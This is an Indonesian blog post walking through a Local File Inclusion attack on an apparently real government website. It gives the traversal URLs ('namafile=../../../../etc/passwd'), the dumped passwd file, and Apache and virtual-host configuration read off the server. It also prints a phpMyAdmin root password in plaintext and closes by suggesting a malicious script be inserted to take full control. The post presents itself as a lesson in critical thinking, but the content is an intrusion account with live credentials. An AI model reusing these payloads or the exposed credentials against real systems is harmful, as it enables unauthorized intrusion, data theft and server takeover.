Saya akan mempergunakan bug sederhana pada situs
.gov, Local File Inclusion, kalo saya bilang mungkin eksekusinya paling hanya
beberapa menit saja Tapi sekali lagi yang saya titik beratkan disini adalah
pola berfikir kritisnya Waktu itu saya sedang browsing mencari satu artikel
pada salah satu situs pemerintah www.somename.go.id nah artikel yang saya
cari ternyata bisa didownload berbentuk pdf di url ini - http://www.somename.go.id/portalbaru/portal/konten.php? nama=Buku&op=index_buku&mn=6&smn=f disitu saya liat url untuk mendownloadnya adalah - http://www.somename.go.id/portalbaru/portal/konten.php? nama=Buku&op=dl_buku&namafile=WDR_2008_eng_web.pdf Pemikiran iseng mulai muncul, bagaimana
jika namafile=WDR_2008_eng_web.pdf saya ganti menjadi sesuatu.
- http://www.somename.go.id/portalbaru/portal/konten.php? nama=Buku&op=dl_buku&namafile=blablu.pdf nah WDR_2008_eng_web.pdf saya ubah menjadi blablu.pdf,
ternyata aplikasi web tadi memperbolehkan saya untuk mendownload
blablu.pdf seolah2 file tersebut ada, lalu saya ingin mencoba memasukkan path system - http://www.somename.go.id/portalbaru/portal/konten.php? nama=Buku&op=dl_buku&namafile=../../../etc/passwd ternyata dia mendownload file juga, tapi isinya kosong, saya asumsikan bahwa aplikasi diberikan permission yang cukup tinggi untuk mengakses file2 sensitif pada server, saya trial and error aja jika begitu, sehingga mencapai url - http://www.somename.go.id/portalbaru/portal/konten.php? nama=Buku&op=dl_buku&namafile=
../../../../../../../../../../../etc/passwd nah disini akhirnya file passwd terdownload dengan sempurna root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes: /root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User: /var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var /spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user: /nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user: /var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:
/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user: /nonexistent:/usr/sbin/nologin aman:*:1001:1001:User &:/home/aman:/bin/sh mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin ya sudah, sampe di sini saya tidak akan memberikan URL lanjutannya, saya hanya akan memberikan pola berpikir iseng saya - step berikutnya saya berfikir, saya harus mencari dimana letak file2 sensitif yang bermanfaat tentunya, karena posisi saya sedang berada di satu warnet (anggaplah begitu) yang tidak memungkinkan saya menjalankan tools, scanner, atau apalah yang semacamnya - yang saya fikir pertama tentunya dimana letak konfigurasi webserver - saya harus mengetahui versi dari web server, daemon web server, serta operating sistem yang digunakan - banyak situs di web yang bisa digunakan untuk mencari informasi ini, saya dapatkan informasi bahwa OS nya adalah FreeBSD dengan Apache 2.2 sebagai webserver - Lalu saya googling dengen k/w "httpd.conf in freebsd apache 2.2" muncullah hasil /usr/local/etc/apache22/httpd.conf - Kemudian saya download httpd.conf dengan menggunakan metoda di atas, muncul hasil file configurasi, disana saya garis bawahi ada satu baris informasi penting # Virtual hosts Include etc/apache22/extra/httpd-vhosts.conf - Saya lanjutkan pencarian ke /usr/local/etc/apache22/extra/httpd-vhosts.conf pada file tersebut saya melihat ada baris <VirtualHost 192.xxx.1.xxx:80> # <VirtualHost 222.xxx.11.xxx:80> ServerAdmin amanbudi@somename.go.id # DocumentRoot "/usr/local/www/apache22/data/ web-somename__upload@07032009/portal" DocumentRoot "/usr/local/www/apache22/data/portal2" ServerName www.somename.go.id Alias /db4dm1n /usr/local/www/apache22/phpMyAdmin <Directory /usr/local/www/apache22/phpMyAdmin> AllowOverride All </Directory> - nah berarti disitulah letak phpmyadminnya, beserta url untuk mengaksesnya lalu bagaimana dengan login dan passwordnya? Phpmyadmin bukanlah suatu aplikasi yang aneh, sebagian besar orang rata2 pernah menggunakannya secara umum settingan default konfigurasi ada di /phpmyadmin direktori/config.inc.php - Lalu saya lanjutkan ke /usr/local/www/apache22/phpMyAdmin/config.inc.php dalam file tersebut ada informasi $cfg['Servers'][$i]['user'] = 'root'; $cfg['Servers'][$i]['password'] = 'sf7100sy'; - voila, anda dapat masuk ke dalam mysqladmin, menyelipkan script jahat untuk mendapatkan full akses dari server tersebut
Tidak ada komentar:
Posting Komentar